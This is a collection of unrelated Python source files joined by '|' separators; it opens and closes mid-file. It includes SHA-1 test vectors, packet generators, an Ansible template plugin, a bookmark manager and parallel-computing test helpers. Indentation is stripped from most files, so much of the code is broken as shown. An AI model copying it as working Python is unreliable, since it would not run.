new_kwargs[k] = jsonify_arg_input(v)
if new_args:
json_dict['args'] = new_args
if new_kwargs:
json_dict['kwargs'] = new_kwargs
return json_dict
def jsonify_arg_input(arg):
"""Jsonify user input (in AssemblyPipeline `append` and `insert` methods)
into a standard step json."""
if isinstance(arg, RunnableArgument):
return arg.to_json()
# If a function object or name of a function is provided, we assume it
# does not have to be run (function itself is argument).
if inspect.isfunction(arg):
func_name = arg.__name__
if func_name not in pipeline_functions:
register_pipeline(arg)
return {'function': func_name, 'no_run': True}
if isinstance(arg, str) and arg in pipeline_functions:
return {'function': arg, 'no_run': True}
# For some functions Statement type has to be argument
if inspect.isclass(arg) and issubclass(arg, Statement):
return {'stmt_type': arg.__name__}
# Argument is a simple value and can be stored as provided
return arg
|
""" sha1Hash_test.py
Unit tests for sha1.py
"""
from crypto.hash.sha1Hash import SHA1
import unittest
import struct
assert struct.calcsize('!IIIII') == 20, '5 integers should be 20 bytes'
class SHA1_FIPS180_TestCases(unittest.TestCase):
""" SHA-1 tests from FIPS180-1 Appendix A, B and C """
def testFIPS180_1_Appendix_A(self):
""" APPENDIX A. A SAMPLE MESSAGE AND ITS MESSAGE DIGEST """
hashAlg = SHA1()
message = 'abc'
message_digest = 0xA9993E36L, 0x4706816AL, 0xBA3E2571L, 0x7850C26CL, 0x9CD0D89DL
md_string = _toBString(message_digest)
assert( hashAlg(message) == md_string ), 'FIPS180 Appendix A test Failed'
def testFIPS180_1_Appendix_B(self):
""" APPENDIX B. A SECOND SAMPLE MESSAGE AND ITS MESSAGE DIGEST """
hashAlg = SHA1()
message = 'abcdbcdecdefdefgefghfghighijhijkijkljklmklmnlmnomnopnopq'
message_digest = 0x84983E44L, 0x1C3BD26EL, 0xBAAE4AA1L, 0xF95129E5L, 0xE54670F1L
md_string = _toBString(message_digest)
assert( hashAlg(message) == md_string ), 'FIPS180 Appendix B test Failed'
def testFIPS180_1_Appendix_C(self):
""" APPENDIX C. A THIRD SAMPLE MESSAGE AND ITS MESSAGE DIGEST
Let the message be the binary-coded form of the ASCII string which consists
of 1,000,000 repetitions of "a". """
hashAlg = SHA1()
message = 1000000*'a'
message_digest = 0x34AA973CL, 0xD4C4DAA4L, 0xF61EEB2BL, 0xDBAD2731L, 0x6534016FL
md_string = _toBString(message_digest)
assert( hashAlg(message) == md_string ), 'FIPS180 Appendix C test Failed'
def _toBlock(binaryString):
""" Convert binary string to blocks of 5 words of uint32() """
return [uint32(word) for word in struct.unpack('!IIIII', binaryString)]
def _toBString(block):
""" Convert block (5 words of 32 bits to binary string """
return ''.join([struct.pack('!I',word) for word in block])
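# Round-trip sketch (not part of the original tests): _toBString packs five
# 32-bit words big-endian, so 0x41424344 maps to the ASCII bytes 'ABCD'.
assert _toBString([0x41424344] * 5) == 'ABCD' * 5, '_toBString sanity check'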
if __name__ == '__main__':
# Run the tests from the command line
unittest.main()
|
from datetime import datetime
from django.contrib.contenttypes.models import ContentType
from actstream.managers import ActionManager, stream
class MyActionManager(ActionManager):
@stream
def testfoo(self, object, time=None):
if time is None:
time = datetime.now()
return object.actor_actions.filter(timestamp__lte = time)
@stream
def testbar(self, verb):
return self.filter(verb=verb)
|
from neo.io.basefromrawio import BaseFromRaw
from neo.rawio.plexonrawio import PlexonRawIO
class PlexonIO(PlexonRawIO, BaseFromRaw):
"""
Class for reading the old data format from Plexon
acquisition system (.plx)
Note that Plexon now use a new format PL2 which is NOT
supported by this IO.
Compatible with versions 100 to 106.
Other versions have not been tested.
"""
_prefered_signal_group_mode = 'group-by-same-units'
def __init__(self, filename):
PlexonRawIO.__init__(self, filename=filename)
BaseFromRaw.__init__(self, filename)
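# --- Usage sketch (an assumption, not from this file) ---
# As with other neo IOs built on BaseFromRaw, reading typically goes through
# read_block(); 'data.plx' below is a placeholder path.
if __name__ == '__main__':
    io = PlexonIO(filename='data.plx')
    block = io.read_block()
    print(block)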
|
''' Copyright (c) 2013 Potential Ventures Ltd
Copyright (c) 2013 SolarFlare Communications Inc
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name of Potential Ventures Ltd,
SolarFlare Communications Inc nor the
names of its contributors may be used to endorse or promote products
derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL POTENTIAL VENTURES LTD BE LIABLE FOR ANY
DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. '''
"""
Collection of Ethernet Packet generators to use for testdata generation
Most generators take the keyword argument "payload" which can be
used to control the payload contents if required. Defaults to random data.
"""
import random
from scapy.all import Ether, IP, UDP
import logging
logging.getLogger("scapy").setLevel(logging.ERROR)
from cocotb.decorators import public
from cocotb.generators.byte import get_bytes, random_data
_default_payload = random_data
@public
def udp_all_sizes(max_size=1500, payload=_default_payload()):
"""UDP packets of every supported size"""
header = Ether() / IP() / UDP()
for size in range(0, max_size - len(header)):
yield header / get_bytes(size, payload)
@public
def udp_random_sizes(npackets=100, payload=_default_payload()):
"""UDP packets with random sizes"""
header = Ether() / IP() / UDP()
max_size = 1500 - len(header)
for pkt in range(npackets):
yield header / get_bytes(random.randint(0, max_size), payload)
@public
def ipv4_small_packets(npackets=100, payload=_default_payload()):
"""Small (<100bytes payload) IPV4 packets"""
for pkt in range(npackets):
yield Ether() / IP() / get_bytes(random.randint(0, 100), payload)
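# --- Demonstration sketch (not part of the original module) ---
# Drawing a few packets from one of the generators above; requires scapy.
# Lengths differ between runs because the payload size is random.
if __name__ == "__main__":
    for i, pkt in enumerate(udp_random_sizes(npackets=3)):
        print("packet %d: %d bytes" % (i, len(pkt)))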
|
"""Add mod versioning
Revision ID: 1d46e8d4483
Revises: 2650a2191fe
Create Date: 2014-06-10 01:29:49.567535
"""
revision = '1d46e8d4483'
down_revision = '2650a2191fe'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_column('mod', 'ksp_version')
op.drop_column('mod', 'keywords')
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.add_column('mod', sa.Column('keywords', sa.VARCHAR(length=256), autoincrement=False, nullable=True))
op.add_column('mod', sa.Column('ksp_version', sa.VARCHAR(length=16), autoincrement=False, nullable=True))
### end Alembic commands ###
|
import pyspeckit
import os
from pyspeckit.spectrum.models import nh2d
import numpy as np
import astropy.units as u
if not os.path.exists('p-nh2d_spec.fits'):
import astropy.utils.data as aud
from astropy.io import fits
f = aud.download_file('https://github.com/pyspeckit/pyspeckit-example-files/raw/master/p-nh2d_spec.fits')
with fits.open(f) as ff:
ff.writeto('p-nh2d_spec.fits')
spec = pyspeckit.Spectrum('p-nh2d_spec.fits')
rms = np.std(spec.data[10:340])
spec.error[:] = rms
spec.xarr.refX = 110.153594*u.GHz
spec.xarr.velocity_convention = 'radio'
spec.xarr.convert_to_unit('km/s')
F=False
T=True
import matplotlib.pyplot as plt
plt.ion()
spec.Registry.add_fitter('nh2d_vtau', pyspeckit.models.nh2d.nh2d_vtau_fitter,4)
spec.specfit(fittype='nh2d_vtau', guesses=[5.52, 2.15, 0.166, 0.09067],
verbose_level=4, signal_cut=1.5, limitedmax=[F,T,T,T], limitedmin=[T,T,T,T],
minpars=[0, 0, -1, 0.05], maxpars=[30.,50.,1,0.5], fixed=[F,F,F,F])
spec.plotter(errstyle='fill')
spec.specfit.plot_fit()
plt.savefig('example_p-NH2D.png')
|
import email
from email.Parser import Parser as MailParser
import time
def get_message_date(content, header='Date'):
"""
Parses mail and returns resulting timestamp.
:param header: the header to extract date from;
:returns: timestamp or `None` in the case of failure.
"""
message = MailParser().parsestr(content, True)
dateheader = message.get(header)
# parsedate_tz returns a 10-tuple that can be passed to mktime_tz
# Will be None if missing or not in a valid format. Note that
# indexes 6, 7, and 8 of the result tuple are not usable.
datetuple = email.utils.parsedate_tz(dateheader)
if datetuple is None:
return None
return email.utils.mktime_tz(datetuple)
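# --- Self-test sketch (not part of the original module) ---
# An RFC 2822 Date header parses to a POSIX timestamp; a missing or
# malformed header yields None.
if __name__ == '__main__':
    raw = "Date: Mon, 20 Nov 1995 19:12:08 -0500\n\nbody\n"
    print get_message_date(raw)            # 816912728
    print get_message_date("\n\nbody\n")   # None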
|
class BookmarkData:
def __init__(self, _id, _title, _url, _parent, _type):
self.mId = _id
self.mTitle = _title
self.mUrl = _url
self.mParent = _parent
self.mType = _type
    def dump(self, _indent=' '):
        print "%s-> %d, %s, %s, %d, %d" % (_indent, self.mId, self.mTitle, self.mUrl, self.mParent, self.mType)
class CategoryData:
def __init__(self, _id, _name):
self.mId = _id
self.mName = _name
self.mBookmarks = {}
def setBookmarks(self, _bookmarks):
self.mBookmarks = _bookmarks
def appendBookmark(self, _bookmark):
self.mBookmarks[_bookmark.mId] = _bookmark
def dump(self):
print " -> %d, %s" % (self.mId, self.mName)
for key in self.mBookmarks.iterkeys():
self.mBookmarks[key].dump(' ')
import ConfigParser
class SimpleConfigParser:
def __init__(self):
self.mFileName = None
self.mConfig = None
self.mCategoryCurrentIdx = 0
self.mBookmarkCurrentIdx = 0
self.mDataValid = False
self.mPopulateValid = False
def _read(self):
if self.mDataValid:
return
print "populate!!"
self.mConfig.read(self.mFileName)
self.mCategoryCurrentIdx = self.getNumber('__SYS__', 'category_current_idx')
self.mBookmarkCurrentIdx = self.getNumber('__SYS__', 'bookmark_current_idx')
self.mDataValid = True
def _save(self):
with open(self.mFileName, 'wb') as bookmarkFile:
self.mConfig.write(bookmarkFile)
self.mDataValid = False
self.mPopulateValid = False
def _del(self, _section, _option=None):
#print _section, ' :', _option
if _option is None:
if not self.exist(_section):
return
self.mConfig.remove_section(_section)
return
if not self.exist(_section, _option):
return
self.mConfig.remove_option(_section, _option)
def _get(self, _section, _option, _default):
try:
data = self.mConfig.get(_section, _option)
except Exception, e:
#print e
return _default
else : return data
def _set(self, _section, _option, _value):
self.mConfig.set(_section, _option, _value)
def exist(self, _section, _option=None):
if _option is None:
return self.mConfig.has_section(_section)
return self.mConfig.has_option(_section, _option)
def setNumber(self, _section, _option, _value):
self._set(_section, _option, str(_value))
def setString(self, _section, _option, _value):
self._set(_section, _option, _value)
def getNumber(self, _section, _option, _default=0):
return int(self._get(_section, _option, _default))
def getString(self, _section, _option, _default=''):
return self._get(_section, _option, _default)
def delOption(self, _section, _option):
self._del(_section, _option)
def addSection(self, _section):
self.mConfig.add_section(_section)
def delSection(self, _section):
self._del(_section)
def init(self, _fileName):
self.mFileName = _fileName
self.mConfig = ConfigParser.RawConfigParser()
if self.mConfig is None:
return False
self._read()
return True
class BookmarkManager(SimpleConfigParser):
_instance = None
def __new__(cls, *args, **kwargs):
if not cls._instance:
            cls._instance = super(BookmarkManager, cls).__new__(cls, *args, **kwargs)
return cls._instance
def __init__(self, _dbFileName):
SimpleConfigParser.__init__(self)
self.mBookmarkRoot = None
self.mDebugEnable = True
import os
if not os.path.exists(_dbFileName):
f = file('/proc/stb/info/vumodel')
model = f.read().strip()
f.close()
manualmode = (model == "solo2" or model == "duo2")
out = open(_dbFileName, 'w')
line = "[__SYS__]\n"
line = line + "category_current_idx = 1\n"
if manualmode :
line = line + "bookmark_current_idx = 3\n"
else:
line = line + "bookmark_current_idx = 2\n"
line = line + "\n"
line = line + "[c-1]\n"
line = line + "id = 1\n"
line = line + "name = My favorite\n"
line = line + "\n"
line = line + "[b-1]\n"
line = line + "id = 1\n"
line = line + "title = Google Com\n"
line = line + "url = http://www.google.com/\n"
line = line + "parent = 1\n"
line = line + "type = 0\n"
line = line + "\n"
line = line + "[b-2]\n"
line = line + "id = 2\n"
line = line + "title = HBBig\n"
line = line + "url = http://www.hbbig.com/\n"
line = line + "parent = 1\n"
line = line + "type = 0\n"
line = line + "\n"
if manualmode :
line = line + "[b-3]\n"
line = line + "url = file:///usr/local/manual/main.html\n"
line = line + "id = 2\n"
line = line + "parent = 1\n"
line = line + "title = User Manual\n"
line = line + "type = 1\n"
out.write(line)
self.init(_dbFileName)
def message(self, format, params=None):
if not self.mDebugEnable:
return
if params is None:
print format
else: print format % (params)
def getBookmark(self, _title):
self.populate()
for key in self.mBookmarkRoot.iterkeys():
for key2 in self.mBookmarkRoot[key].mBookmarks.iterkeys():
if self.mBookmarkRoot[key].mBookmarks[key2].mTitle == _title:
return 'b-%d' % (self.mBookmarkRoot[key].mBookmarks[key2].mId)
return None
def addBookmark(self, _title, _url, _parent, _type):
if self.getBookmark(_title) is not None:
return False
i = self.mBookmarkCurrentIdx + 1
s = "b-%d" % (i,)
self.message("add bookmark : %s, %s, %d, %d", (_title, _url, _parent, _type,))
self.mConfig.add_section(s)
self.setNumber(s, 'id', i)
self.setString(s, 'title', _title)
self.setString(s, 'url', _url)
self.setNumber(s, 'parent', _parent)
self.setNumber(s, 'type', _type)
self.setNumber('__SYS__', 'bookmark_current_idx', i)
self._save()
return True
def deleteBookmark(self, _id):
self.populate()
self.message("delete bookmark : %d", (_id,))
self.delSection('b-%d' % (_id,))
self._save()
def updateBookmark(self, _bookmark):
self.populate()
s = "b-%d" % (_bookmark.mId)
self.message("update bookmark : %s, %s, %d, %d", (_bookmark.mTitle, _bookmark.mUrl, _bookmark.mParent, _bookmark.mType,))
self.setString(s, 'title', _bookmark.mTitle)
self.setString(s, 'url', _bookmark.mUrl)
self.setNumber(s, 'parent', _bookmark.mParent)
self.setNumber(s, 'type', _bookmark.mType)
self._save()
def getCategory(self, _name):
self.populate()
for key in self.mBookmarkRoot.iterkeys():
if self.mBookmarkRoot[key].mName == _name:
return 'c-%d' % (self.mBookmarkRoot[key].mId)
return None
def addCategory(self, _name):
if self.getCategory(_name) is not None:
return False
self.message("add category : %s", (_name,))
i = self.mCategoryCurrentIdx + 1
s = "c-%d" % (i)
self.mConfig.add_section(s)
self.setNumber(s, 'id', i)
        self.setString(s, 'name', _name)
self.setNumber('__SYS__', 'category_current_idx', i)
self._save()
return True
def deleteCategory(self, _id):
self.populate()
self.message("delete category : %d", (_id,))
try:
for key in self.mBookmarkRoot[_id].mBookmarks.iterkeys():
self.delSection('b-%d' % (key,))
except: pass
self.delSection('c-%d' % (_id,))
self._save()
def updateCategory(self, _category):
self.populate()
self.message("update category : %s", (_category.mName,))
s = "c-%d" % (_category.mId)
self.setNumber(s, 'name', _category.mName)
self._save()
def populate(self):
cx, bx = 0, 0
categoryList = {}
self.message("populate : %d, %d", (self.mPopulateValid, self.mDataValid))
self._read()
if self.mPopulateValid:
return
while cx <= self.mCategoryCurrentIdx:
s = 'c-%d' % (cx,)
i = self.getNumber(s, 'id', -1)
if i != -1:
n = self.getString(s, 'name')
categoryList[i] = CategoryData(i, n)
cx += 1
sorted(categoryList)
while bx <= self.mBookmarkCurrentIdx:
s = 'b-%d' % (bx,)
i = self.getNumber(s, 'id', -1)
if i != -1:
t = self.getString(s, 'title')
u = self.getString(s, 'url')
p = self.getNumber(s, 'parent')
e = self.getNumber(s, 'type')
try:
categoryList[p].appendBookmark(BookmarkData(i, t, u, p, e))
except Exception, e: self._del(s)
bx += 1
for key in categoryList.iterkeys():
sorted(categoryList[key].mBookmarks)
self.mBookmarkRoot = categoryList
self.mPopulateValid = True
self.dump()
def getBookmarkRoot(self):
self.populate()
return self.mBookmarkRoot
def dump(self):
if not self.mDebugEnable:
return
self.populate()
print "-- snapshot --"
for key in self.mBookmarkRoot.iterkeys():
self.mBookmarkRoot[key].dump()
print "--------------"
@staticmethod
def getInstance():
return BookmarkManager('/etc/enigma2/hbbtv_bookmark.ini')
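# --- Usage sketch (not part of the original module) ---
# Illustrative only: __init__ reads /proc/stb/info/vumodel when creating a
# fresh database, so this runs as-is only on a VU+ set-top box; the path and
# titles below are placeholders.
if __name__ == '__main__':
    manager = BookmarkManager('/tmp/hbbtv_bookmark_demo.ini')
    manager.addCategory('News')
    manager.addBookmark('Example', 'http://example.com/', 1, 0)
    manager.dump()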
|
"""Configuration for Zenodo Records."""
from __future__ import absolute_import, print_function
from flask_babelex import gettext
from speaklater import make_lazy_gettext
_ = make_lazy_gettext(lambda: gettext)
ZENODO_COMMUNITIES_AUTO_ENABLED = True
"""Automatically add and request to communities upon publishing."""
ZENODO_COMMUNITIES_AUTO_REQUEST = ['zenodo', ]
"""Communities which are to be auto-requested upon first publishing."""
ZENODO_COMMUNITIES_REQUEST_IF_GRANTS = ['ecfunded', ]
"""Communities which are to be auto-requested if record has grants."""
ZENODO_COMMUNITIES_ADD_IF_GRANTS = []
"""Communities which are to be auto-added if record has grants."""
ZENODO_BUCKET_QUOTA_SIZE = 50 * 1000 * 1000 * 1000 # 50 GB
"""Maximum quota per bucket."""
ZENODO_MAX_FILE_SIZE = ZENODO_BUCKET_QUOTA_SIZE
"""Maximum file size accepted."""
|
from .Base import Base
from .misc import parse_name, safename
class Crypter(Base):
__name__ = "Crypter"
__type__ = "crypter"
__version__ = "0.20"
__status__ = "stable"
__pattern__ = r'^unmatchable$'
__config__ = [("activated", "bool", "Activated", True),
("use_premium", "bool", "Use premium account if available", True),
("folder_per_package", "Default;Yes;No", "Create folder for each package", "Default")]
__description__ = """Base decrypter plugin"""
__license__ = "GPLv3"
__authors__ = [("Walter Purcaro", "vuolter@gmail.com")]
def init_base(self):
#: Put all packages here. It's a list of tuples like: ( name, [list of links], folder )
self.packages = []
self.links = [] #: List of urls, pyLoad will generate packagenames
def setup_base(self):
self.packages = []
self.links = []
def process(self, pyfile):
self.decrypt(pyfile)
if self.links:
self._generate_packages()
elif not self.packages:
self.error(_("No link grabbed"), "decrypt")
self._create_packages()
def decrypt(self, pyfile):
"""
The "main" method of every crypter plugin, you **have to** overwrite it
"""
raise NotImplementedError
def _generate_packages(self):
"""
Generate new packages from self.links
"""
name = self.info['pattern'].get("N")
if name is None:
links = map(self.fixurl, self.links)
pdict = self.pyload.api.generatePackages(links)
packages = [(_name, _links, parse_name(_name))
for _name, _links in pdict.items()]
else:
packages = [(name, self.links, parse_name(name))]
self.packages.extend(packages)
def _create_packages(self):
"""
Create new packages from self.packages
"""
pack_folder = self.pyfile.package().folder
pack_password = self.pyfile.package().password
pack_queue = self.pyfile.package().queue
folder_per_package = self.config.get('folder_per_package', "Default")
if folder_per_package == "Default":
folder_per_package = self.pyload.config.get(
'general', 'folder_per_package')
else:
folder_per_package = folder_per_package == "Yes"
for name, links, folder in self.packages:
self.log_info(_("Create package: %s") % name,
_("%d links") % len(links))
links = map(self.fixurl, links)
self.log_debug("LINKS for package " + name, *links)
pid = self.pyload.api.addPackage(name, links, pack_queue)
if pack_password:
self.pyload.api.setPackageData(
pid, {'password': pack_password})
#: Workaround to do not break API addPackage method
set_folder = lambda x: self.pyload.api.setPackageData(
pid, {'folder': safename(x or "")})
if not folder_per_package:
folder = pack_folder
elif not folder or folder == name:
folder = parse_name(name)
self.log_info(_("Save package `%(name)s` to folder: %(folder)s")
% {'name': name, 'folder': folder})
set_folder(folder)
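# --- Illustrative subclass sketch (not part of pyLoad itself) ---
# A concrete decrypter only has to override decrypt() and fill self.links
# and/or self.packages; process() above then turns them into packages. The
# pattern, the URL scheme and the use of self.load() (assumed to be inherited
# from Base) are placeholders for the sake of the example.
import re
class ExampleCrypter(Crypter):
    __name__ = "ExampleCrypter"
    __type__ = "crypter"
    __pattern__ = r'http://(?:www\.)?example\.com/folder/\w+'

    def decrypt(self, pyfile):
        html = self.load(pyfile.url)
        self.links = re.findall(r'href="(http://[^"]+)"', html)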
|
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import base64
import datetime
import os
import pwd
import time
from ansible import constants as C
from ansible.plugins.action import ActionBase
from ansible.utils.hashing import checksum_s
from ansible.utils.unicode import to_bytes
class ActionModule(ActionBase):
TRANSFERS_FILES = True
def get_checksum(self, tmp, dest, try_directory=False, source=None):
remote_checksum = self._remote_checksum(tmp, dest)
if remote_checksum in ('0', '2', '3', '4'):
# Note: 1 means the file is not present which is fine; template
# will create it. 3 means directory was specified instead of file
if try_directory and remote_checksum == '3' and source:
base = os.path.basename(source)
dest = os.path.join(dest, base)
remote_checksum = self.get_checksum(tmp, dest, try_directory=False)
if remote_checksum not in ('0', '2', '3', '4'):
return remote_checksum
result = dict(failed=True, msg="failed to checksum remote file."
" Checksum error code: %s" % remote_checksum)
return result
return remote_checksum
def run(self, tmp=None, task_vars=dict()):
''' handler for template operations '''
source = self._task.args.get('src', None)
dest = self._task.args.get('dest', None)
faf = self._task.first_available_file
        if (source is None and faf is None) or dest is None:
return dict(failed=True, msg="src and dest are required")
if tmp is None:
tmp = self._make_tmp_path()
if faf:
#FIXME: issue deprecation warning for first_available_file, use with_first_found or lookup('first_found',...) instead
found = False
for fn in faf:
fn_orig = fn
fnt = self._templar.template(fn)
                fnd = self._loader.path_dwim(self._task._role._role_path, 'templates', fnt)
                if not os.path.exists(fnd):
                    of = task_vars.get('_original_file', None)
                    if of is not None:
                        fnd = self._loader.path_dwim(self._task._role._role_path, 'templates', of)
if os.path.exists(fnd):
source = fnd
found = True
break
if not found:
return dict(failed=True, msg="could not find src in first_available_file list")
else:
if self._task._role is not None:
source = self._loader.path_dwim_relative(self._task._role._role_path, 'templates', source)
else:
source = self._loader.path_dwim(source)
# Expand any user home dir specification
dest = self._remote_expand_user(dest, tmp)
directory_prepended = False
if dest.endswith(os.sep):
directory_prepended = True
base = os.path.basename(source)
dest = os.path.join(dest, base)
# template the source data locally & get ready to transfer
try:
with open(source, 'r') as f:
template_data = f.read()
try:
template_uid = pwd.getpwuid(os.stat(source).st_uid).pw_name
except:
template_uid = os.stat(source).st_uid
vars = task_vars.copy()
vars['template_host'] = os.uname()[1]
vars['template_path'] = source
vars['template_mtime'] = datetime.datetime.fromtimestamp(os.path.getmtime(source))
vars['template_uid'] = template_uid
vars['template_fullpath'] = os.path.abspath(source)
vars['template_run_date'] = datetime.datetime.now()
managed_default = C.DEFAULT_MANAGED_STR
managed_str = managed_default.format(
host = vars['template_host'],
uid = vars['template_uid'],
file = to_bytes(vars['template_path'])
)
vars['ansible_managed'] = time.strftime(
managed_str,
time.localtime(os.path.getmtime(source))
)
old_vars = self._templar._available_variables
self._templar.set_available_variables(vars)
resultant = self._templar.template(template_data, preserve_trailing_newlines=True)
self._templar.set_available_variables(old_vars)
except Exception as e:
return dict(failed=True, msg=type(e).__name__ + ": " + str(e))
local_checksum = checksum_s(resultant)
remote_checksum = self.get_checksum(tmp, dest, not directory_prepended, source=source)
if isinstance(remote_checksum, dict):
# Error from remote_checksum is a dict. Valid return is a str
return remote_checksum
if local_checksum != remote_checksum:
# if showing diffs, we need to get the remote value
dest_contents = ''
# FIXME: still need to implement diff mechanism
#if self.runner.diff:
# # using persist_files to keep the temp directory around to avoid needing to grab another
# dest_result = self.runner._execute_module(conn, tmp, 'slurp', "path=%s" % dest, task_vars=task_vars, persist_files=True)
# if 'content' in dest_result.result:
# dest_contents = dest_result.result['content']
# if dest_result.result['encoding'] == 'base64':
# dest_contents = base64.b64decode(dest_contents)
# else:
# raise Exception("unknown encoding, failed: %s" % dest_result.result)
xfered = self._transfer_data(self._connection._shell.join_path(tmp, 'source'), resultant)
# fix file permissions when the copy is done as a different user
if self._connection_info.become and self._connection_info.become_user != 'root':
self._remote_chmod('a+r', xfered, tmp)
# run the copy module
new_module_args = self._task.args.copy()
new_module_args.update(
dict(
src=xfered,
dest=dest,
original_basename=os.path.basename(source),
follow=True,
),
)
result = self._execute_module(module_name='copy', module_args=new_module_args, task_vars=task_vars)
if result.get('changed', False):
result['diff'] = dict(before=dest_contents, after=resultant)
return result
else:
# when running the file module based on the template data, we do
# not want the source filename (the name of the template) to be used,
# since this would mess up links, so we clear the src param and tell
# the module to follow links. When doing that, we have to set
# original_basename to the template just in case the dest is
# a directory.
new_module_args = self._task.args.copy()
new_module_args.update(
dict(
src=None,
original_basename=os.path.basename(source),
follow=True,
),
)
return self._execute_module(module_name='file', module_args=new_module_args, task_vars=task_vars)
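# --- Usage sketch (illustrative, not from this file) ---
# A playbook task that exercises this template action; values are placeholders:
#
#   - template:
#       src: nginx.conf.j2
#       dest: /etc/nginx/nginx.conf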
|
from spack import *
class Xgc(AutotoolsPackage):
"""xgc is an X11 graphics demo that shows various features of the X11
core protocol graphics primitives."""
homepage = "http://cgit.freedesktop.org/xorg/app/xgc"
url = "https://www.x.org/archive/individual/app/xgc-1.0.5.tar.gz"
version('1.0.5', '605557a9c138f6dc848c87a21bc7c7fc')
depends_on('libxaw')
depends_on('libxt')
depends_on('flex', type='build')
depends_on('bison', type='build')
depends_on('pkgconfig', type='build')
depends_on('util-macros', type='build')
|
import scoop
scoop.DEBUG = False
import unittest
import subprocess
import time
import copy
import os
import sys
import operator
import signal
import math
from tests_parser import TestUtils
from tests_stat import TestStat
from tests_stopwatch import TestStopWatch
from scoop import futures, _control, utils, shared
from scoop._types import FutureQueue
from scoop.broker.structs import BrokerInfo
subprocesses = []
def cleanSubprocesses(*args):
    # Signal handlers are called with (signum, frame); accept and ignore them.
    for a in subprocesses:
        a.kill()
try:
signal.signal(signal.SIGQUIT, cleanSubprocesses)
except AttributeError:
# SIGQUIT doesn't exist on Windows
signal.signal(signal.SIGTERM, cleanSubprocesses)
def func0(n):
task = futures.submit(func1, n)
result = task.result()
return result
def func1(n):
result = futures.map(func2, [i+1 for i in range(n)])
return sum(result)
def func2(n):
launches = []
for i in range(n):
launches.append(futures.submit(func3, i + 1))
result = futures.as_completed(launches)
return sum(r.result() for r in result)
def func3(n):
result = list(futures.map(func4, [i+1 for i in range(n)]))
return sum(result)
def func4(n):
result = n * n
return result
def funcLambda(n):
lambda_func = lambda x : x*x
result = list(futures.map(lambda_func, [i+1 for i in range(n)]))
return sum(result)
def funcWithKW(n, **kwargs):
return kwargs
def funcLambdaSubfuncNotGlobal(n):
"""Tests a lambda function containing a call to a function that is not in
the globals()."""
my_mul = operator.mul
lambda_func = lambda x : my_mul(x, x)
result = list(futures.map(lambda_func, [i+1 for i in range(n)]))
return sum(result)
def funcCos():
result = list(futures.map(math.cos, [i for i in range(10)]))
return sum(result)
def funcCallback():
f = futures.submit(func4, 100)
def callBack(future):
future.was_callabacked = True
f.add_done_callback(callBack)
if len(f.callback) == 0:
return False
futures.wait((f,))
try:
return f.was_callabacked
except:
return False
def funcCancel():
f = futures.submit(func4, 100)
f.cancel()
return f.cancelled()
def funcCompleted(n):
launches = []
for i in range(n):
launches.append(futures.submit(func4, i + 1))
result = futures.as_completed(launches)
return sum(r.result() for r in result)
def funcDone():
f = futures.submit(func4, 100)
futures.wait((f,))
done = f.done()
if done != True:
return done
res = f.result()
done = f.done()
return done
def funcWait(timeout):
fs = [futures.submit(func4, i) for i in range(1000)]
done, not_done = futures.wait(fs, timeout=timeout)
return done, not_done
def funcExcept(n):
f = futures.submit(funcRaise, n)
try:
f.result()
except:
return True
return False
def funcRaise(n):
raise Exception("Test exception")
def funcSub(n):
f = futures.submit(func4, n)
return f.result()
def funcMapScan(l):
resultat = futures.mapScan(func4,
operator.add,
l)
_control.execQueue.socket.pumpInfoSocket()
return resultat
def funcMapReduce(l):
resultat = futures.mapReduce(func4,
operator.add,
l)
_control.execQueue.socket.pumpInfoSocket()
return resultat
def funcDoubleMapReduce(l):
resultat = futures.mapReduce(func4,
operator.add,
l)
resultat2 = futures.mapReduce(func4,
operator.add,
l)
_control.execQueue.socket.pumpInfoSocket()
return resultat == resultat2
def funcUseSharedConstant():
# Tries on a mutable and an immutable object
assert shared.getConst('myVar') == {
1: 'Example 1',
2: 'Example 2',
3: 'Example 3',
}
assert shared.getConst('secondVar') == "Hello World!"
return True
def funcUseSharedFunction():
assert shared.getConst('myRemoteFunc')(5) == 5 * 5
assert shared.getConst('myRemoteFunc')(25) == 25 * 25
return True
def funcSharedConstant():
shared.setConst(myVar={1: 'Example 1',
2: 'Example 2',
3: 'Example 3',
})
shared.setConst(secondVar="Hello World!")
result = True
for _ in range(100):
try:
result &= futures.submit(funcUseSharedConstant).result()
except AssertionError:
result = False
return result
def funcSharedFunction():
shared.setConst(myRemoteFunc=func4)
result = True
for _ in range(100):
try:
result &= futures.submit(funcUseSharedFunction).result()
except AssertionError:
result = False
return result
def funcMapAsCompleted(n):
result = list(futures.map_as_completed(func4, [i+1 for i in range(n)]))
return sum(result)
def funcIter(n):
result = list(futures.map(func4, (i+1 for i in range(n))))
return sum(result)
def funcKeywords(n, **kwargs):
task = futures.submit(funcWithKW, n, **kwargs)
futures.wait([task], return_when=futures.ALL_COMPLETED)
result = task.result()
return result
def main(n):
task = futures.submit(func0, n)
futures.wait([task], return_when=futures.ALL_COMPLETED)
result = task.result()
return result
def mainSimple(n):
task = futures.submit(func3, n)
futures.wait([task], return_when=futures.ALL_COMPLETED)
result = task.result()
return result
def submit_get_queues_size(n):
task = futures.submit(func4, n)
result = task.result()
return [
